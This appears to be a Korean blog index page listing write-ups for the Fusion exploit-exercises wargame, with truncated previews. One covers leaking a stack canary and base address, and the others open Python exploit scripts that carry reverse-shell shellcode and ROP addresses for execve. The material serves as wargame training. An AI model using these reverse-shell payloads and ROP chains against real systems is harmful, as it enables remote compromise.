목록워게임/fusion - exploit_exercises (5)
int $0x80
binary base address를 브루트포싱으로 구했는데지금 생각해보니 ssp 메세지에 메모리덤프가 오는걸 까먹고있었다이거 이용하면 브루트포싱 필요 X최초실행시 password = '' 밑에 password='~~~~' 를 주석처리하고 canary = '' binary = 0으로 설정하고 실행한뒤 다음에 실행할때 세개 값 확인해서 넣어두면 빠르게 가능 password 알아올때 마지막 글자만 분리한 이유는 왜그런지는 아직 모르겠는데 마지..
from cd80 import * import hmac import hashlib import time s = makeCon("192.168.81.140", 20003) token = eval(s.recv(4096)) print token # LHOST=127.0.0.1 LPORT=4321 shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\ "\x80\x93\x59\x..
import structfrom socket import *import sysimport time p = lambda x : struct.pack("<L", x)HOST = "220.78.196.48"PORT = 20002 s = socket(AF_INET, SOCK_STREAM)s.connect((HOST, PORT)) read_plt = 0x08048860execve_plt = 0x80489b0copy_addr = 0x804b42..